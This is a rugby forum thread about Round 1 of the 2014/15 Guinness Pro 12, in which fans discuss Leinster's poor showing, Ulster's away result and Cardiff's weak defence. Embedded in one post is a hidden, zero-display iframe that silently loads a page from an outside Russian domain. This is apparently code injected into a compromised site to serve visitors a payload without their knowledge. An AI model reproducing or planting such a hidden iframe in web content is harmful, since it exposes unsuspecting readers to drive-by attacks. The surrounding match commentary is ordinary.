• Help Support The Rugby Forum :

Guinness Pro 12 2014/15: Round 1

This is awful ****e, no spark with similar one dimensional play to last season.

And I thought Williams was bad yesterday, cop on Boss.

Last edited:
Regardless of this result - O'Connor really putting his stamp on the team that were double European Champions and Challenge Cup holders before his arrival...
<iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe>

Matawalu is a lucky boy! Nice to see 10 minutes of good rugby, should have closed it out though. McGrath and McGrath made a big, big difference with Boss having been pure muck all day!

Matawalu was so lucky there that Nige didn't allow that tap. Could have cost Glasgow the game!

Cian Healy had a very bad day at the office, struggling in scrums and badly falling off a tackle for Josh Strauss' try.

Luke McGrath added quite a bit of tempo when he came on. Zane Kirchner was a positive too.

How can professional players not realize that standing still when you receive the ball isn't a recipe for success? Charge onto the ball and you have a far better chance of busting the gainline.

More I think about it, the happier I am with Ulster's result. 3 points off an away trip to Scarlets is decent going, particularly at this stage of the season when everything's a bit of a lottery and the team aren't at full strength. The mental fortitude was good, the ambition was good, the rest can be worked on.

Also, I simply can't wait to see Olding have a real cut at teams at international level.

Who'd have thought after week 1 Leinster are worst Irish team and Connacht the best. But in fairness Leinster fought back well and as Snoop said McGrath added superbly but it was few experienced heads like Healy who let them down today. I think preseason is still going on in all provinces and it showed this weekend we probably a week or 2 behind.

Blues looking quite average out in Italy at the moment.

Refereeing really not helping, shoddy missed calls all over the place.

Accuracy has been terrible from the tight five, loads of mistakes and unforced errors. I was expecting more from the pack as they haven't really provided a clean platform.

Some good attacking moves from the Blues, but once again, the defence has been very poor.

The pictures from Italy are dire, worse still is that blinking rugby ball that cuts over the screen every so often, often cutting the highlight short.

Gavin Evans subbed. Craig Mitchell has made more line breaks at centre since he came on.

What are Cardiff like at the minute? Can't catch the game and I have to say I was quite surprised to see a few sky pundits put them for top 4 this season.. somebody, can't remember who, even put the Dragons for top as well.

What are Cardiff like at the minute? Can't catch the game and I have to say I was quite surprised to see a few sky pundits put them for top 4 this season.. somebody, can't remember who, even put the Dragons for top as well.

Cardiff have recruited quite well over the summer, and barring injuries should be stronger than last year. Mark Hammett (the new DOR from the Hurricanes) didn't arrive until the first preseason game so hasn't had time to make a huge impact. In preseason, Cardiff did not look particularly well drilled, especially against Exeter. I suppose this isn't a surprise knowing a new DoR was on the way.

I feel Cardiff's defence has been very poor over the last two years and that seems to be the case again. There isn't a lot of structure and it will cost Cardiff more than one game this season if it doesn't improve quickly.

In saying that there were some encouraging signs in attack today with Patchell and Corey Allen looking sharp and a few players on the bench putting their hands up. 41 points and a BP win I'll take happily considering the rustiness and potential new systems settling in. I think the real test will be against Glasgow next week, who will bring a big pack and will be confident after their last performance.

Cardiff have recruited quite well over the summer, and barring injuries should be stronger than last year. Mark Hammett (the new DOR from the Hurricanes) didn't arrive until the first preseason game so hasn't had time to make a huge impact. In preseason, Cardiff did not look particularly well drilled, especially against Exeter. I suppose this isn't a surprise knowing a new DoR was on the way.

I feel Cardiff's defence has been very poor over the last two years and that seems to be the case again. There isn't a lot of structure and it will cost Cardiff more than one game this season if it doesn't improve quickly.

In saying that there were some encouraging signs in attack today with Patchell and Corey Allen looking sharp and a few players on the bench putting their hands up. 41 points and a BP win I'll take happily considering the rustiness and potential new systems settling in. I think the real test will be against Glasgow next week, who will bring a big pack and will be confident after their last performance.

Agreed with this, defence has been dire and continued to be dire today, better teams would have scored more against the Blues today.

Do you personally though think Cardiff can finish in the top four?